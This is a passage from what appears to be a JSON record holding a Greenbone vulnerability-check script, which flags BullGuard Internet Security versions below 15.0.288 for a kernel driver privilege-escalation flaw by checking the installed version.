vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard Internet Security before\n version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Internet Security\n version 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_internet_security_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Internet/Security/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}